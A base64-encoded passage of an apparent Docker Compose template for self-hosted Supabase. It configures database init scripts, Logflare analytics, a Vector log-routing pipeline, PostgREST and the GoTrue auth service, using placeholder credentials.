oKSBTRVQgc2VhcmNoX3BhdGggPSBzdXBhYmFzZV9mdW5jdGlvbnM7XG5SRVZPS0UgQUxMIE9OIEZVTkNUSU9OIHN1cGFiYXNlX2Z1bmN0aW9ucy5odHRwX3JlcXVlc3QoKSBGUk9NIFBVQkxJQztcbkdSQU5UIEVYRUNVVEUgT04gRlVOQ1RJT04gc3VwYWJhc2VfZnVuY3Rpb25zLmh0dHBfcmVxdWVzdCgpIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5DT01NSVQ7XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvcm9sZXMuc3FsCiAgICAgICAgdGFyZ2V0OiAvZG9ja2VyLWVudHJ5cG9pbnQtaW5pdGRiLmQvaW5pdC1zY3JpcHRzLzk5LXJvbGVzLnNxbAogICAgICAgIGNvbnRlbnQ6ICItLSBOT1RFOiBjaGFuZ2UgdG8geW91ciBvd24gcGFzc3dvcmRzIGZvciBwcm9kdWN0aW9uIGVudmlyb25tZW50c1xuIFxcc2V0IHBncGFzcyBgZWNobyBcIiRQT1NUR1JFU19QQVNTV09SRFwiYFxuXG4gQUxURVIgVVNFUiBhdXRoZW50aWNhdG9yIFdJVEggUEFTU1dPUkQgOidwZ3Bhc3MnO1xuIEFMVEVSIFVTRVIgcGdib3VuY2VyIFdJVEggUEFTU1dPUkQgOidwZ3Bhc3MnO1xuIEFMVEVSIFVTRVIgc3VwYWJhc2VfYXV0aF9hZG1pbiBXSVRIIFBBU1NXT1JEIDoncGdwYXNzJztcbiBBTFRFUiBVU0VSIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiBXSVRIIFBBU1NXT1JEIDoncGdwYXNzJztcbiBBTFRFUiBVU0VSIHN1cGFiYXNlX3N0b3JhZ2VfYWRtaW4gV0lUSCBQQVNTV09SRCA6J3BncGFzcyc7XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvand0LnNxbAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL2luaXQtc2NyaXB0cy85OS1qd3Quc3FsCiAgICAgICAgY29udGVudDogIlxcc2V0IGp3dF9zZWNyZXQgYGVjaG8gXCIkSldUX1NFQ1JFVFwiYFxuXFxzZXQgand0X2V4cCBgZWNobyBcIiRKV1RfRVhQXCJgXG5cXHNldCBkYl9uYW1lIGBlY2hvIFwiJHtQT1NUR1JFU19EQjotcG9zdGdyZXN9XCJgXG5cbkFMVEVSIERBVEFCQVNFIDpkYl9uYW1lIFNFVCBcImFwcC5zZXR0aW5ncy5qd3Rfc2VjcmV0XCIgVE8gOidqd3Rfc2VjcmV0JztcbkFMVEVSIERBVEFCQVNFIDpkYl9uYW1lIFNFVCBcImFwcC5zZXR0aW5ncy5qd3RfZXhwXCIgVE8gOidqd3RfZXhwJztcbiIKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9kYi9sb2dzLnNxbAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL21pZ3JhdGlvbnMvOTktbG9ncy5zcWwKICAgICAgICBjb250ZW50OiAiXFxzZXQgcGd1c2VyIGBlY2hvIFwic3VwYWJhc2VfYWRtaW5cImBcblxcYyBfc3VwYWJhc2VcbmNyZWF0ZSBzY2hlbWEgaWYgbm90IGV4aXN0cyBfYW5hbHl0aWNzO1xuYWx0ZXIgc2NoZW1hIF9hbmFseXRpY3Mgb3duZXIgdG8gOnBndXNlcjtcblxcYyBwb3N0Z3Jlc1xuIgogICAgICAtICdzdXBhYmFzZS1kYi1jb25maWc6L2V0Yy9wb3N0Z3Jlc3FsLWN1c3RvbScKICBzdXBhYmFzZS1hbmFseXRpY3M6CiAgICBpbWFnZTogJ3N1cGFiYXNlL2xvZ2ZsYXJlOjEuNC4wJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjQwMDAvaGVhbHRoJwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBMT0dGTEFSRV9OT0RFX0hPU1Q9MTI3LjAuMC4xCiAgICAgIC0gREJfVVNFUk5BTUU9c3VwYWJhc2VfYWRtaW4KICAgICAgLSBEQl9EQVRBQkFTRT1fc3VwYWJhc2UKICAgICAgLSAnREJfSE9TVE5BTUU9JHtQT1NUR1JFU19IT1NUTkFNRTotc3VwYWJhc2UtZGJ9JwogICAgICAtICdEQl9QT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gJ0RCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gREJfU0NIRU1BPV9hbmFseXRpY3MKICAgICAgLSAnTE9HRkxBUkVfQVBJX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfTE9HRkxBUkV9JwogICAgICAtIExPR0ZMQVJFX1NJTkdMRV9URU5BTlQ9dHJ1ZQogICAgICAtIExPR0ZMQVJFX1NJTkdMRV9URU5BTlRfTU9ERT10cnVlCiAgICAgIC0gTE9HRkxBUkVfU1VQQUJBU0VfTU9ERT10cnVlCiAgICAgIC0gTE9HRkxBUkVfTUlOX0NMVVNURVJfU0laRT0xCiAgICAgIC0gJ1BPU1RHUkVTX0JBQ0tFTkRfVVJMPXBvc3RncmVzcWw6Ly9zdXBhYmFzZV9hZG1pbjoke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QCR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifToke1BPU1RHUkVTX1BPUlQ6LTU0MzJ9L19zdXBhYmFzZScKICAgICAgLSBQT1NUR1JFU19CQUNLRU5EX1NDSEVNQT1fYW5hbHl0aWNzCiAgICAgIC0gTE9HRkxBUkVfRkVBVFVSRV9GTEFHX09WRVJSSURFPW11bHRpYmFja2VuZD10cnVlCiAgc3VwYWJhc2UtdmVjdG9yOgogICAgaW1hZ2U6ICd0aW1iZXJpby92ZWN0b3I6MC4yOC4xLWFscGluZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLS1uby12ZXJib3NlJwogICAgICAgIC0gJy0tdHJpZXM9MScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vc3VwYWJhc2UtdmVjdG9yOjkwMDEvaGVhbHRoJwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMwogICAgdm9sdW1lczoKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9sb2dzL3ZlY3Rvci55bWwKICAgICAgICB0YXJnZXQ6IC9ldGMvdmVjdG9yL3ZlY3Rvci55bWwKICAgICAgICByZWFkX29ubHk6IHRydWUKICAgICAgICBjb250ZW50OiAiYXBpOlxuICBlbmFibGVkOiB0cnVlXG4gIGFkZHJlc3M6IDAuMC4wLjA6OTAwMVxuXG5zb3VyY2VzOlxuICBkb2NrZXJfaG9zdDpcbiAgICB0eXBlOiBkb2NrZXJfbG9nc1xuICAgIGV4Y2x1ZGVfY29udGFpbmVyczpcbiAgICAgIC0gc3VwYWJhc2UtdmVjdG9yXG5cbnRyYW5zZm9ybXM6XG4gIHByb2plY3RfbG9nczpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gZG9ja2VyX2hvc3RcbiAgICBzb3VyY2U6IHwtXG4gICAgICAucHJvamVjdCA9IFwiZGVmYXVsdFwiXG4gICAgICAuZXZlbnRfbWVzc2FnZSA9IGRlbCgubWVzc2FnZSlcbiAgICAgIC5hcHBuYW1lID0gZGVsKC5jb250YWluZXJfbmFtZSlcbiAgICAgIGRlbCguY29udGFpbmVyX2NyZWF0ZWRfYXQpXG4gICAgICBkZWwoLmNvbnRhaW5lcl9pZClcbiAgICAgIGRlbCguc291cmNlX3R5cGUpXG4gICAgICBkZWwoLnN0cmVhbSlcbiAgICAgIGRlbCgubGFiZWwpXG4gICAgICBkZWwoLmltYWdlKVxuICAgICAgZGVsKC5ob3N0KVxuICAgICAgZGVsKC5zdHJlYW0pXG4gIHJvdXRlcjpcbiAgICB0eXBlOiByb3V0ZVxuICAgIGlucHV0czpcbiAgICAgIC0gcHJvamVjdF9sb2dzXG4gICAgcm91dGU6XG4gICAgICBrb25nOiAnc3RhcnRzX3dpdGgoc3RyaW5nISguYXBwbmFtZSksIFwic3VwYWJhc2Uta29uZ1wiKSdcbiAgICAgIGF1dGg6ICdzdGFydHNfd2l0aChzdHJpbmchKC5hcHBuYW1lKSwgXCJzdXBhYmFzZS1hdXRoXCIpJ1xuICAgICAgcmVzdDogJ3N0YXJ0c193aXRoKHN0cmluZyEoLmFwcG5hbWUpLCBcInN1cGFiYXNlLXJlc3RcIiknXG4gICAgICByZWFsdGltZTogJ3N0YXJ0c193aXRoKHN0cmluZyEoLmFwcG5hbWUpLCBcInJlYWx0aW1lLWRldlwiKSdcbiAgICAgIHN0b3JhZ2U6ICdzdGFydHNfd2l0aChzdHJpbmchKC5hcHBuYW1lKSwgXCJzdXBhYmFzZS1zdG9yYWdlXCIpJ1xuICAgICAgZnVuY3Rpb25zOiAnc3RhcnRzX3dpdGgoc3RyaW5nISguYXBwbmFtZSksIFwic3VwYWJhc2UtZnVuY3Rpb25zXCIpJ1xuICAgICAgZGI6ICdzdGFydHNfd2l0aChzdHJpbmchKC5hcHBuYW1lKSwgXCJzdXBhYmFzZS1kYlwiKSdcbiAgIyBJZ25vcmVzIG5vbiBuZ2lueCBlcnJvcnMgc2luY2UgdGhleSBhcmUgcmVsYXRlZCB3aXRoIGtvbmcgYm9vdGluZyB1cFxuICBrb25nX2xvZ3M6XG4gICAgdHlwZTogcmVtYXBcbiAgICBpbnB1dHM6XG4gICAgICAtIHJvdXRlci5rb25nXG4gICAgc291cmNlOiB8LVxuICAgICAgcmVxLCBlcnIgPSBwYXJzZV9uZ2lueF9sb2coLmV2ZW50X21lc3NhZ2UsIFwiY29tYmluZWRcIilcbiAgICAgIGlmIGVyciA9PSBudWxsIHtcbiAgICAgICAgICAudGltZXN0YW1wID0gcmVxLnRpbWVzdGFtcFxuICAgICAgICAgIC5tZXRhZGF0YS5yZXF1ZXN0LmhlYWRlcnMucmVmZXJlciA9IHJlcS5yZWZlcmVyXG4gICAgICAgICAgLm1ldGFkYXRhLnJlcXVlc3QuaGVhZGVycy51c2VyX2FnZW50ID0gcmVxLmFnZW50XG4gICAgICAgICAgLm1ldGFkYXRhLnJlcXVlc3QuaGVhZGVycy5jZl9jb25uZWN0aW5nX2lwID0gcmVxLmNsaWVudFxuICAgICAgICAgIC5tZXRhZGF0YS5yZXF1ZXN0Lm1ldGhvZCA9IHJlcS5tZXRob2RcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5wYXRoID0gcmVxLnBhdGhcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5wcm90b2NvbCA9IHJlcS5wcm90b2NvbFxuICAgICAgICAgIC5tZXRhZGF0YS5yZXNwb25zZS5zdGF0dXNfY29kZSA9IHJlcS5zdGF0dXNcbiAgICAgIH1cbiAgICAgIGlmIGVyciAhPSBudWxsIHtcbiAgICAgICAgYWJvcnRcbiAgICAgIH1cbiAgIyBJZ25vcmVzIG5vbiBuZ2lueCBlcnJvcnMgc2luY2UgdGhleSBhcmUgcmVsYXRlZCB3aXRoIGtvbmcgYm9vdGluZyB1cFxuICBrb25nX2VycjpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gcm91dGVyLmtvbmdcbiAgICBzb3VyY2U6IHwtXG4gICAgICAubWV0YWRhdGEucmVxdWVzdC5tZXRob2QgPSBcIkdFVFwiXG4gICAgICAubWV0YWRhdGEucmVzcG9uc2Uuc3RhdHVzX2NvZGUgPSAyMDBcbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfbmdpbnhfbG9nKC5ldmVudF9tZXNzYWdlLCBcImVycm9yXCIpXG4gICAgICBpZiBlcnIgPT0gbnVsbCB7XG4gICAgICAgICAgLnRpbWVzdGFtcCA9IHBhcnNlZC50aW1lc3RhbXBcbiAgICAgICAgICAuc2V2ZXJpdHkgPSBwYXJzZWQuc2V2ZXJpdHlcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5ob3N0ID0gcGFyc2VkLmhvc3RcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5oZWFkZXJzLmNmX2Nvbm5lY3RpbmdfaXAgPSBwYXJzZWQuY2xpZW50XG4gICAgICAgICAgdXJsLCBlcnIgPSBzcGxpdChwYXJzZWQucmVxdWVzdCwgXCIgXCIpXG4gICAgICAgICAgaWYgZXJyID09IG51bGwge1xuICAgICAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5tZXRob2QgPSB1cmxbMF1cbiAgICAgICAgICAgICAgLm1ldGFkYXRhLnJlcXVlc3QucGF0aCA9IHVybFsxXVxuICAgICAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5wcm90b2NvbCA9IHVybFsyXVxuICAgICAgICAgIH1cbiAgICAgIH1cbiAgICAgIGlmIGVyciAhPSBudWxsIHtcbiAgICAgICAgYWJvcnRcbiAgICAgIH1cbiAgIyBHb3RydWUgbG9ncyBhcmUgc3RydWN0dXJlZCBqc29uIHN0cmluZ3Mgd2hpY2ggZnJvbnRlbmQgcGFyc2VzIGRpcmVjdGx5LiBCdXQgd2Uga2VlcCBtZXRhZGF0YSBmb3IgY29uc2lzdGVuY3kuXG4gIGF1dGhfbG9nczpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gcm91dGVyLmF1dGhcbiAgICBzb3VyY2U6IHwtXG4gICAgICBwYXJzZWQsIGVyciA9IHBhcnNlX2pzb24oLmV2ZW50X21lc3NhZ2UpXG4gICAgICBpZiBlcnIgPT0gbnVsbCB7XG4gICAgICAgICAgLm1ldGFkYXRhLnRpbWVzdGFtcCA9IHBhcnNlZC50aW1lXG4gICAgICAgICAgLm1ldGFkYXRhID0gbWVyZ2UhKC5tZXRhZGF0YSwgcGFyc2VkKVxuICAgICAgfVxuICAjIFBvc3RnUkVTVCBsb2dzIGFyZSBzdHJ1Y3R1cmVkIHNvIHdlIHNlcGFyYXRlIHRpbWVzdGFtcCBmcm9tIG1lc3NhZ2UgdXNpbmcgcmVnZXhcbiAgcmVzdF9sb2dzOlxuICAgIHR5cGU6IHJlbWFwXG4gICAgaW5wdXRzOlxuICAgICAgLSByb3V0ZXIucmVzdFxuICAgIHNvdXJjZTogfC1cbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfcmVnZXgoLmV2ZW50X21lc3NhZ2UsIHInXig/UDx0aW1lPi4qKTogKD9QPG1zZz4uKikkJylcbiAgICAgIGlmIGVyciA9PSBudWxsIHtcbiAgICAgICAgICAuZXZlbnRfbWVzc2FnZSA9IHBhcnNlZC5tc2dcbiAgICAgICAgICAudGltZXN0YW1wID0gdG9fdGltZXN0YW1wIShwYXJzZWQudGltZSlcbiAgICAgICAgICAubWV0YWRhdGEuaG9zdCA9IC5wcm9qZWN0XG4gICAgICB9XG4gICMgUmVhbHRpbWUgbG9ncyBhcmUgc3RydWN0dXJlZCBzbyB3ZSBwYXJzZSB0aGUgc2V2ZXJpdHkgbGV2ZWwgdXNpbmcgcmVnZXggKGlnbm9yZSB0aW1lIGJlY2F1c2UgaXQgaGFzIG5vIGRhdGUpXG4gIHJlYWx0aW1lX2xvZ3M6XG4gICAgdHlwZTogcmVtYXBcbiAgICBpbnB1dHM6XG4gICAgICAtIHJvdXRlci5yZWFsdGltZVxuICAgIHNvdXJjZTogfC1cbiAgICAgIC5tZXRhZGF0YS5wcm9qZWN0ID0gZGVsKC5wcm9qZWN0KVxuICAgICAgLm1ldGFkYXRhLmV4dGVybmFsX2lkID0gLm1ldGFkYXRhLnByb2plY3RcbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfcmVnZXgoLmV2ZW50X21lc3NhZ2UsIHInXig/UDx0aW1lPlxcZCs6XFxkKzpcXGQrXFwuXFxkKykgXFxbKD9QPGxldmVsPlxcdyspXFxdICg/UDxtc2c+LiopJCcpXG4gICAgICBpZiBlcnIgPT0gbnVsbCB7XG4gICAgICAgICAgLmV2ZW50X21lc3NhZ2UgPSBwYXJzZWQubXNnXG4gICAgICAgICAgLm1ldGFkYXRhLmxldmVsID0gcGFyc2VkLmxldmVsXG4gICAgICB9XG4gICMgU3RvcmFnZSBsb2dzIG1heSBjb250YWluIGpzb24gb2JqZWN0cyBzbyB3ZSBwYXJzZSB0aGVtIGZvciBjb21wbGV0ZW5lc3NcbiAgc3RvcmFnZV9sb2dzOlxuICAgIHR5cGU6IHJlbWFwXG4gICAgaW5wdXRzOlxuICAgICAgLSByb3V0ZXIuc3RvcmFnZVxuICAgIHNvdXJjZTogfC1cbiAgICAgIC5tZXRhZGF0YS5wcm9qZWN0ID0gZGVsKC5wcm9qZWN0KVxuICAgICAgLm1ldGFkYXRhLnRlbmFudElkID0gLm1ldGFkYXRhLnByb2plY3RcbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfanNvbiguZXZlbnRfbWVzc2FnZSlcbiAgICAgIGlmIGVyciA9PSBudWxsIHtcbiAgICAgICAgICAuZXZlbnRfbWVzc2FnZSA9IHBhcnNlZC5tc2dcbiAgICAgICAgICAubWV0YWRhdGEubGV2ZWwgPSBwYXJzZWQubGV2ZWxcbiAgICAgICAgICAubWV0YWRhdGEudGltZXN0YW1wID0gcGFyc2VkLnRpbWVcbiAgICAgICAgICAubWV0YWRhdGEuY29udGV4dFswXS5ob3N0ID0gcGFyc2VkLmhvc3RuYW1lXG4gICAgICAgICAgLm1ldGFkYXRhLmNvbnRleHRbMF0ucGlkID0gcGFyc2VkLnBpZFxuICAgICAgfVxuICAjIFBvc3RncmVzIGxvZ3Mgc29tZSBtZXNzYWdlcyB0byBzdGRlcnIgd2hpY2ggd2UgbWFwIHRvIHdhcm5pbmcgc2V2ZXJpdHkgbGV2ZWxcbiAgZGJfbG9nczpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gcm91dGVyLmRiXG4gICAgc291cmNlOiB8LVxuICAgICAgLm1ldGFkYXRhLmhvc3QgPSBcImRiLWRlZmF1bHRcIlxuICAgICAgLm1ldGFkYXRhLnBhcnNlZC50aW1lc3RhbXAgPSAudGltZXN0YW1wXG5cbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfcmVnZXgoLmV2ZW50X21lc3NhZ2UsIHInLiooP1A8bGV2ZWw+SU5GT3xOT1RJQ0V8V0FSTklOR3xFUlJPUnxMT0d8RkFUQUx8UEFOSUM/KTouKicsIG51bWVyaWNfZ3JvdXBzOiB0cnVlKVxuXG4gICAgICBpZiBlcnIgIT0gbnVsbCB8fCBwYXJzZWQgPT0gbnVsbCB7XG4gICAgICAgIC5tZXRhZGF0YS5wYXJzZWQuZXJyb3Jfc2V2ZXJpdHkgPSBcImluZm9cIlxuICAgICAgfVxuICAgICAgaWYgcGFyc2VkICE9IG51bGwge1xuICAgICAgLm1ldGFkYXRhLnBhcnNlZC5lcnJvcl9zZXZlcml0eSA9IHBhcnNlZC5sZXZlbFxuICAgICAgfVxuICAgICAgaWYgLm1ldGFkYXRhLnBhcnNlZC5lcnJvcl9zZXZlcml0eSA9PSBcImluZm9cIiB7XG4gICAgICAgICAgLm1ldGFkYXRhLnBhcnNlZC5lcnJvcl9zZXZlcml0eSA9IFwibG9nXCJcbiAgICAgIH1cbiAgICAgIC5tZXRhZGF0YS5wYXJzZWQuZXJyb3Jfc2V2ZXJpdHkgPSB1cGNhc2UhKC5tZXRhZGF0YS5wYXJzZWQuZXJyb3Jfc2V2ZXJpdHkpXG5cbnNpbmtzOlxuICBsb2dmbGFyZV9hdXRoOlxuICAgIHR5cGU6ICdodHRwJ1xuICAgIGlucHV0czpcbiAgICAgIC0gYXV0aF9sb2dzXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgdXJpOiAnaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL2FwaS9sb2dzP3NvdXJjZV9uYW1lPWdvdHJ1ZS5sb2dzLnByb2QmYXBpX2tleT0ke0xPR0ZMQVJFX0FQSV9LRVk/TE9HRkxBUkVfQVBJX0tFWSBpcyByZXF1aXJlZH0nXG4gIGxvZ2ZsYXJlX3JlYWx0aW1lOlxuICAgIHR5cGU6ICdodHRwJ1xuICAgIGlucHV0czpcbiAgICAgIC0gcmVhbHRpbWVfbG9nc1xuICAgIGVuY29kaW5nOlxuICAgICAgY29kZWM6ICdqc29uJ1xuICAgIG1ldGhvZDogJ3Bvc3QnXG4gICAgcmVxdWVzdDpcbiAgICAgIHJldHJ5X21heF9kdXJhdGlvbl9zZWNzOiAxMFxuICAgIHVyaTogJ2h0dHA6Ly9zdXBhYmFzZS1hbmFseXRpY3M6NDAwMC9hcGkvbG9ncz9zb3VyY2VfbmFtZT1yZWFsdGltZS5sb2dzLnByb2QmYXBpX2tleT0ke0xPR0ZMQVJFX0FQSV9LRVk/TE9HRkxBUkVfQVBJX0tFWSBpcyByZXF1aXJlZH0nXG4gIGxvZ2ZsYXJlX3Jlc3Q6XG4gICAgdHlwZTogJ2h0dHAnXG4gICAgaW5wdXRzOlxuICAgICAgLSByZXN0X2xvZ3NcbiAgICBlbmNvZGluZzpcbiAgICAgIGNvZGVjOiAnanNvbidcbiAgICBtZXRob2Q6ICdwb3N0J1xuICAgIHJlcXVlc3Q6XG4gICAgICByZXRyeV9tYXhfZHVyYXRpb25fc2VjczogMTBcbiAgICB1cmk6ICdodHRwOi8vc3VwYWJhc2UtYW5hbHl0aWNzOjQwMDAvYXBpL2xvZ3M/c291cmNlX25hbWU9cG9zdGdSRVNULmxvZ3MucHJvZCZhcGlfa2V5PSR7TE9HRkxBUkVfQVBJX0tFWT9MT0dGTEFSRV9BUElfS0VZIGlzIHJlcXVpcmVkfSdcbiAgbG9nZmxhcmVfZGI6XG4gICAgdHlwZTogJ2h0dHAnXG4gICAgaW5wdXRzOlxuICAgICAgLSBkYl9sb2dzXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgIyBXZSBtdXN0IHJvdXRlIHRoZSBzaW5rIHRocm91Z2gga29uZyBiZWNhdXNlIGluZ2VzdGluZyBsb2dzIGJlZm9yZSBsb2dmbGFyZSBpcyBmdWxseSBpbml0aWFsaXNlZCB3aWxsXG4gICAgIyBsZWFkIHRvIGJyb2tlbiBxdWVyaWVzIGZyb20gc3R1ZGlvLiBUaGlzIHdvcmtzIGJ5IHRoZSBhc3N1bXB0aW9uIHRoYXQgY29udGFpbmVycyBhcmUgc3RhcnRlZCBpbiB0aGVcbiAgICAjIGZvbGxvd2luZyBvcmRlcjogdmVjdG9yID4gZGIgPiBsb2dmbGFyZSA+IGtvbmdcbiAgICB1cmk6ICdodHRwOi8vc3VwYWJhc2Uta29uZzo4MDAwL2FuYWx5dGljcy92MS9hcGkvbG9ncz9zb3VyY2VfbmFtZT1wb3N0Z3Jlcy5sb2dzJmFwaV9rZXk9JHtMT0dGTEFSRV9BUElfS0VZP0xPR0ZMQVJFX0FQSV9LRVkgaXMgcmVxdWlyZWR9J1xuICBsb2dmbGFyZV9mdW5jdGlvbnM6XG4gICAgdHlwZTogJ2h0dHAnXG4gICAgaW5wdXRzOlxuICAgICAgLSByb3V0ZXIuZnVuY3Rpb25zXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgdXJpOiAnaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL2FwaS9sb2dzP3NvdXJjZV9uYW1lPWRlbm8tcmVsYXktbG9ncyZhcGlfa2V5PSR7TE9HRkxBUkVfQVBJX0tFWT9MT0dGTEFSRV9BUElfS0VZIGlzIHJlcXVpcmVkfSdcbiAgbG9nZmxhcmVfc3RvcmFnZTpcbiAgICB0eXBlOiAnaHR0cCdcbiAgICBpbnB1dHM6XG4gICAgICAtIHN0b3JhZ2VfbG9nc1xuICAgIGVuY29kaW5nOlxuICAgICAgY29kZWM6ICdqc29uJ1xuICAgIG1ldGhvZDogJ3Bvc3QnXG4gICAgcmVxdWVzdDpcbiAgICAgIHJldHJ5X21heF9kdXJhdGlvbl9zZWNzOiAxMFxuICAgIHVyaTogJ2h0dHA6Ly9zdXBhYmFzZS1hbmFseXRpY3M6NDAwMC9hcGkvbG9ncz9zb3VyY2VfbmFtZT1zdG9yYWdlLmxvZ3MucHJvZC4yJmFwaV9rZXk9JHtMT0dGTEFSRV9BUElfS0VZP0xPR0ZMQVJFX0FQSV9LRVkgaXMgcmVxdWlyZWR9J1xuICBsb2dmbGFyZV9rb25nOlxuICAgIHR5cGU6ICdodHRwJ1xuICAgIGlucHV0czpcbiAgICAgIC0ga29uZ19sb2dzXG4gICAgICAtIGtvbmdfZXJyXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgdXJpOiAnaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL2FwaS9sb2dzP3NvdXJjZV9uYW1lPWNsb3VkZmxhcmUubG9ncy5wcm9kJmFwaV9rZXk9JHtMT0dGTEFSRV9BUElfS0VZP0xPR0ZMQVJFX0FQSV9LRVkgaXMgcmVxdWlyZWR9J1xuIgogICAgICAtICcvdmFyL3J1bi9kb2NrZXIuc29jazovdmFyL3J1bi9kb2NrZXIuc29jazpybycKICAgIGVudmlyb25tZW50OgogICAgICAtICdMT0dGTEFSRV9BUElfS0VZPSR7U0VSVklDRV9QQVNTV09SRF9MT0dGTEFSRX0nCiAgICBjb21tYW5kOgogICAgICAtICctLWNvbmZpZycKICAgICAgLSBldGMvdmVjdG9yL3ZlY3Rvci55bWwKICBzdXBhYmFzZS1yZXN0OgogICAgaW1hZ2U6ICdwb3N0Z3Jlc3QvcG9zdGdyZXN0OnYxMi4yLjEyJwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUEdSU1RfREJfVVJJPXBvc3RncmVzOi8vYXV0aGVudGljYXRvcjoke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QCR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifToke1BPU1RHUkVTX1BPUlQ6LTU0MzJ9LyR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSAnUEdSU1RfREJfU0NIRU1BUz0ke1BHUlNUX0RCX1NDSEVNQVM6LXB1YmxpYyxzdG9yYWdlLGdyYXBocWxfcHVibGljfScKICAgICAgLSBQR1JTVF9EQl9BTk9OX1JPTEU9YW5vbgogICAgICAtICdQR1JTVF9KV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtIFBHUlNUX0RCX1VTRV9MRUdBQ1lfR1VDUz1mYWxzZQogICAgICAtICdQR1JTVF9BUFBfU0VUVElOR1NfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSAnUEdSU1RfQVBQX1NFVFRJTkdTX0pXVF9FWFA9JHtKV1RfRVhQSVJZOi0zNjAwfScKICAgIGNvbW1hbmQ6IHBvc3RncmVzdAogICAgZXhjbHVkZV9mcm9tX2hjOiB0cnVlCiAgc3VwYWJhc2UtYXV0aDoKICAgIGltYWdlOiAnc3VwYWJhc2UvZ290cnVlOnYyLjE3NC4wJwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBo